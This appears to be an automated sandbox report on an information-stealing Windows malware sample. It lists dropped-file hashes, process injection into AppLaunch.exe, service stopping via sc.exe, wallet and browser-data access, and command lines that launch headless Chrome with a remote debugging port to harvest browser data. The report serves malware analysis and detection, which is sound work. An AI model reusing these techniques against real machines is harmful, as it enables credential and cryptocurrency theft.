memory/1212-434-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/1212-433-0x0000000077C70000-0x0000000077E19000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2628-491-0x000000013FAF0000-0x0000000140D16000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

memory/1672-524-0x000000013FAF0000-0x0000000140D16000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\af40570f-7a98-41f9-9346-fe51625455e0\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

memory/1672-540-0x0000000077C70000-0x0000000077E19000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 12544cec5a97169ce18d6335c67bc697
SHA1 bf4918730f879818a8ef8d6386c61f2ea0f33f44
SHA256 3d0bbd12e730eb34f9fe43f21cfecdbdfea715810ce1477f3d76781bf43826a8
SHA512 87c5a09ec8060309d7f077c2d7a7f615affb4009cbffd872d2d9ca027f5e2322df08c95ed4004aaa8c28d7571f9ab4663489ae8039ebad6781dd2a985a1705a3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 37848517327f0088e636d572c8333b2a
SHA1 cb98297d6290bdd786b7a1e6cd6f80c3fb981fee
SHA256 ec4a4628582dc930264feda0b4a382fdd1758c6fb4da33504cbb1f55c7aaebf2
SHA512 e71046fad9db93ac6169fb70401c819c0f3bf07e11902a6b9a70f0a1ade25e335ed7f7312a249cff1247ef2b254fd550296f5d3e4200b826cbeac2b8d936eca4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 14ded0285fbc04e8f027f9904cf79bb3
SHA1 d2c84a5bb2f8027704c68d69923723d5fb160043
SHA256 07e29124a838c1d5b7fbcfcdfe0f2ecd63f780cf7e6e206b3298d08e511863b1
SHA512 c6c64938d78e62154d82799033466d30b5505439cb37e2e817723641b319c076877207dc9e4fc1457c8d001c77efe87ccb1f32f0f3593c2210509085b24c9e37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Code Cache\js\538c87078bedf74f_0

MD5 a755c6dd21087917c77ec3aa5843e2b5
SHA1 e0b146ad58c80da975ef3438af6922c549cd4486
SHA256 1efe9f4146fb23c91bffd4598315a08debd89dc1595a3e13b9d0fd2e9e8bc9a3
SHA512 e009a6756e3a3242b8c431a200766ffe36c75494b2458246087b20037401b3d0e91928a78ef074e9dab5c565548bbd73d79d43fdb1060fb06d9e69730a1342a3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Code Cache\js\430fe5b6a2437ad7_0

MD5 1497772776fc997f778029f9065c1a32
SHA1 102e0c48023e50711b2b0a5949455348ef46338a
SHA256 c02e2951f6ae5a21cba52bf8db37cab8e87202ad06d48bf3912a896637cf54fb
SHA512 c2d09bcf518d72a9c872b6c0a468185979330948f2ceba728defe7b2213317bff55300a08d462f63edb889f36e2d6b48f733e501979fab7be7d3ab9bf2f21120

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Code Cache\js\408242ca35bda2b3_0

MD5 bdfb83b1053e3bee3a9c356b1364fdbb
SHA1 259e29a60f8ccbd0db0b7ea6ced0b9c6b1b78842
SHA256 588b6d1c3442f5563e2b48cb9aeaf6d53332c9089659a81165c53e2e9526ec62
SHA512 4af08829c157ee5cf9cdb84c5d2e767f35d4877c891a994eab0d317462d46fd651312cc3e201a46e76f379a331852262fbf535cc4f2e26d9ff9fee35db838df5

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_00000d

MD5 189badc72a668aade50699ae05067c2a
SHA1 5458410fc96bcf08b29f204b05470dad5882afb9
SHA256 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559
SHA512 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Code Cache\js\3978e55ddeca1efa_0

MD5 8f5ab58d479a9ae97caa0d9defa626cb
SHA1 78789230f5ad45780c17131eab41ec00ce3b4e88
SHA256 b96bb707798e5c27129f48dfaff4b60ff1945c467704887913a1330a430e5f12
SHA512 952faf77269512d6ad546d0df1c6d524dcfa7ddcd75d06d2e2a5c82ab5ba4ecc2bb98ab75dcbdc957d7d9dc050d175f9632f8a4ce4bf26a142087992b7381613

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Code Cache\js\0268938681f021db_0

MD5 dd648a717e4991ef3d226b645523a55b
SHA1 827205f881820456b9d07dc140c93683b58e1aca
SHA256 a3954d088122563844254b0a7b6674a7d6851e1681ec92cfec0615fbaa6d1f4f
SHA512 6436ea35c19a9c667f6d474069683268a0e5172342f1e2d0582bc33429b34385a8b0748f13529dbec81ca9db304fafab7c67747446ec79a93102dc28daf20947

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\index

MD5 fb5ff356b008d41b540fab09b7b7376a
SHA1 c52370c03f09fcc295f8810dbdf07d190bc790ca
SHA256 a2cfbdf0255f9b1cc96f3e833255da1ac6836d39913f508d94500b1a29dad8bc
SHA512 ae9584a5f3824126a6aa31498cfc2fbae00e72e523b8f646d231a1d2b31b913d07c87d8f2ac958c8d4a33eb51295c10a789ef2f05bda8632a362e8a8e75262c7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000012

MD5 406fd8b43c9c6bd2aff386eb7f935ccc
SHA1 845f7c7ff0d3a95a4fcaa0edba690a9f4812b5c4
SHA256 d8d28d57bf6a97e62a9897d1bb17f0448f754e92930aad3717ef454c445486e9
SHA512 18766ad80d759f4c418c9bb4f7b2e80c727fa5bba45cf2f2b6e3233d3d091ba2cbf27e9aba95fb5067a6eeabef8eaee6af2825a86d29d63d39496120f6ac8b0e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000011

MD5 2072fefb4817f8483253e4ff2685f61f
SHA1 8ad00d28bf9cced992998f4f07b2b45bfbcb276e
SHA256 e4edfbe4f8439c055ab91647f92af65dffb2832334d7934d3edf95ab75a6fc6c
SHA512 67b9771791856c0906e240ed046aca1c47fe15cf807b02e7c00f07ffc566a6941694467ae72f8eb21efd0c67d16fbc652bfbe01d897c61127ae542176d1c56a1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000010

MD5 63efbf21f6edd88b43c20eef3a15ca18
SHA1 4be204b90597aafac5c310695c86ee2ae1f117f3
SHA256 111a46958454e3b925d7d27dd4c9b14665a773c783c79050177e728cde4eb588
SHA512 18eb89e25a0d1e637832f6badf49f0764b1188f8ae2964ff118cdc0470f976e5f5abee05877a9b57bb474b651e7a505247ed096b7ebc5f6c028ddac90533aa79

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_00000f

MD5 789fd4f17cc11ac527dc82ac561b3220
SHA1 83ac8d0ad8661ab3e03844916a339833169fa777
SHA256 5459e6f01b7edde5f425c21808de129b69470ee3099284cb3f9413d835903739
SHA512 742d95bb65dcc72d7ce7056bd4d6f55e2811e98f7a3df6f1b7daef946043183714a8a3049b12a0be8ac21d0b4f6e38f7269960e57b006dfec306158d5a373e78

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_00000e

MD5 db2bafd5a7299458ee228a5f55cafe46
SHA1 495b0477fc5af81b0106cd2e6bda8c80d818095a
SHA256 05cb8f3ad6c20f5a1ffe392b285749c857a8194ed761dfe4a62ce85a02102043
SHA512 8afb1abaccb447157d3045873ee9ec92d6858ce828b8a637d760d38561302e31e79e408d2bad51585a6585bdf0a4b72652e5e6e5799d4f3d171b120d1aba26bb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_00000c

MD5 27cd2cadf2c6803021503d69ef6adb59
SHA1 42db3241dceb8e751bc394963be6c3a600c63438
SHA256 d1b75085ea35b7053cf99dcd0764c28eb035f1228ca2fa4393040a0f1f4e3927
SHA512 6f1862d0cf21c62bc047ebcf66fdabe392c18e3a4534206941fa9ccf0e155c51b1dac0d1409b2283de08fe22782b5d8f48d8956fd33c6e0ccb006a8a9f4acfec

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_00000b

MD5 355dcc3d527c3e9cee6ad0819e479211
SHA1 2e31ed9f7f6214bcc6419de03438c6613357ce56
SHA256 2096b2907f5170ec6a2eb2a418547e187f0e9e03ebd1b4fcf97c948acfb07f7c
SHA512 d61d48c09735e749a7448ac05c577fabdd0b3508aff5acfbd256d141c9dedd209263ecc9d3ef0bfcf80dc83e64115530dba88c608c43f96ec3df366c24a983eb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_00000a

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000009

MD5 99374f3368b192f0ebb50e2ec284e2eb
SHA1 9415121c85654b2bf0a98576c11589ff304665c9
SHA256 85e81bcb282f3c74de592b44362f4adc0271e43743de6bd3c984e59c840d7f28
SHA512 582886a6ff12929ae865e2ceba30e96d0e5a77e2a09b6ba130f2416fc6ac544bc2bd2337df145dabbcae84d13a67e9922a0890c77c40b06149d562116b35a311

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000008

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000007

MD5 500ecdda9ad3e919a1f41c1588266a1b
SHA1 d5ddf92dc08284a48701a4d3555590bda05f77e0
SHA256 caad3feace9086d27e006d538d2daf4dd50e2b33307232a7db6d5f8c48f73b37
SHA512 5e47a0d0721ec0f9adb5a439ffc98c1b4da780e74270332313f8350f228bdb919d32c4812c6ede84ebae3ead1342c2eaf4c73f4dfca5a87e8887e1b5913c0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000006

MD5 d453afffdfdc0b4a8dade7dc8c9572d6
SHA1 58059302d94ed9744e739e388d24bde852996908
SHA256 9c34eeebfce83033015f38c7a605d1fed811fb54720409bfe06ad5c2c91fe2d1
SHA512 2678c762ac65b5edebd1ae552e061495f551a4d037d0dfd0732c98c3e197e498a1b020c927e11f2c3dbd388dcd863f83990632581582e20767b8bb1a0b0f6927

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000005

MD5 424826f09a5a67968c84db6f4ee00859
SHA1 b0914033d4a81f491210c917fbcd3792fe57b2ba
SHA256 ebba4a15a3a62c95fd4e6db66e2c5915b836db7066327b56c18b8073a8640a87
SHA512 cd172785ed9eb8f5e6697a3e29d36d9bc9a94b59df3983c4b47db10098bb62f172c87069c44fd49ea4a55917c27a568d0c1d1f269db1c8431d356cb686f7d2b1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000004

MD5 0977f2f20233a17fc06dc9236779800c
SHA1 72b27cd8285d32b83233cb0e5ec2ce7a4f138dcf
SHA256 8c8bb79747a22dba8089fcb0812e25699420c191394b6e15ed7e20c1e0573199
SHA512 5a34d7896e85b2b8cb4d43dd81f954b41000664cb5a1cba1c6c9eef31026b7a78a50e3ad3475a7db73fd87293910c6df3fffc8e4df54b1e141b09645f964bf37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000003

MD5 44d12dc4a3dc874f8c0182d8113c1590
SHA1 0c5b2dbac5f5265cb045373939890c5ea265af80
SHA256 14c577cbf6a8fbfc3a023adc135a59d45024566b909ee3482e058cf01f600f3a
SHA512 9e532617e92005a3b21f8b64a421326519f28c6146676ad9b4c8e4f2fa059abb1d5c8abde28c23ac1d1750641a0007da7caab34d58abeef039d87f9fde82b0e4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\f_000002

MD5 da4cec20c30abd49c5b03cb178c6e5f7
SHA1 c7a0efa3f505a46e5e5001e4fccbef753f52c119
SHA256 11a703e00e1246b141133c860527146c54979728745aaa1858c20d819144f56a
SHA512 60279e6b06b7d8994c1abc2e75617ff39562fcdcfb4b3d693d5db6b18e05eaea3bec033857bf1dc357a8e9b5228fbf272efd034f048ce4cefb6b005e18e0d26e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\data_3

MD5 d65e59b5d628001a4b2d55852d58b749
SHA1 54dc78154dc9b0fc5c9ea79800590e287ee67869
SHA256 6d7a0a72370fd52d44f3fc2b578a9767a8bf2744d1339cf482d54b48b4a759d1
SHA512 64bc9870de4713dabc6f276185fb60e84a6a450f5a6bd680536016d7db1aa5731515fa263fb20f44f2b74779ca0a0022abd0dae8d7d5591dde646cd9cd023e42

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\data_2

MD5 1db74ddc5f0cefc92397dd36bf50c8a8
SHA1 debb44c019f5e4e190a0c014ab9b526bf7ca8b9f
SHA256 a13bbdf7c5ea7088dac66ada639bf43c3726bebed8e3cea0f4938765054b36c8
SHA512 87c0f46cb8005af9238a2ad51b299af77aeb243043f685981c6916a68454f7d2c6f29d54bb83c080f951ddc7eebf7d7bb5825bdf3aab0e09414fe0e656d9ff2b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\data_1

MD5 eea377a3194149bed3e9148c91c3cb04
SHA1 677384cc4d33f5403edce5ae9d55a20aac7cd710
SHA256 ed310af7cae39a455ab3c07f84cacccae209c527065b0f920599956bc7e62791
SHA512 92bb5d69ad37f709730c278134d4441fe29762340f63d00bafa3c6b5d87d773b7248870ad775656c3f78fec0c984c10ed45fda8d859e36b0ce3e2c6ffd9fb6ae

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Cache\Cache_Data\data_0

MD5 2abf556c28155546c7de9704b7c69133
SHA1 7a247294cbefbbac3660ab612384f9f2f8475e02
SHA256 937f0a2fc8c827e2075a1550a1a13f9d5c6bd2233d6f7c2d80dfaa46271505df
SHA512 2dd9e2a186f44e2505d1ba730807fe01b92abb2c8040505c623e622a024f188bf26e6c2aad57f5f0c9eb0237ebd977e5e878ec50a3aae07af393912a28b6b778

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\chrome_debug.log

MD5 00ef4b3379e4a8858ec5948cce8ffa03
SHA1 cde663673adb18860c1325b781c941fb52a2570c
SHA256 3a638394e4283f42e2b38fc5d9f94d90fa2fc99a1cd8bd09303c1b9116766387
SHA512 9b58196be7635dc4ea9a5bdeff8cc8f2649e788b217e022be8cc1addf9f3972cf3d8c70f989c5bd9930450e935e82d3c0211cdc0d71da5ed69bce6b0a8c69612

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Crashpad\settings.dat

MD5 58b789646b0ae749cefae098be2146d6
SHA1 b822bc9627a919cb75336b8dc3e11021517a03c0
SHA256 156e54db2d812924f8e6bc83026ef1e002ec183c7b20ce1783019f695b9f6af0
SHA512 717350df411bc6341ad1c4e6c5d1597f73dc645546cee29d555ed7c35ae76e25d65f8fb956f7ecfe97d23b6fdb4f02bc3b3a9677094ec3f240f09329a8ca6393

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\DevToolsActivePort

MD5 8cf351d1ceb1eaef510cb88ef50b1cc0
SHA1 a09437f6142c6b7d59d53a20788f34fb886078b2
SHA256 fae636f6f61411f8ab7f469fd48f2fa0f9a86a9cdda810e23f5cf47d4387c8b9
SHA512 a1c8a6a13d5c211177a83e74ea9e4251bd08cb49471c15d5d703cffd447bb54f70662e5a88a5e75fa2994d836fbcab85530e798d1feeff54c707cd4bc8d20841

memory/2240-727-0x0000000074D70000-0x000000007545E000-memory.dmp

memory/2628-729-0x000000013FAF0000-0x0000000140D16000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-08 03:16

Reported

2023-08-08 03:18

Platform

win10v2004-20230703-en

Max time kernel

32s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe"

Signatures

Downloads MZ/PE file

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3204 set thread context of 3632 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4680 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4680 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4680 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4680 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4680 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4680 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4680 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4680 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4680 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4996 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4996 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3204 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3204 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3204 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3204 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3204 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 636 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 636 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1328 wrote to memory of 4348 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1328 wrote to memory of 4348 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe

"C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4680 -ip 4680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3204 -ip 3204

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=64968 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa2e169758,0x7ffa2e169768,0x7ffa2e169778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1284 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1676 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

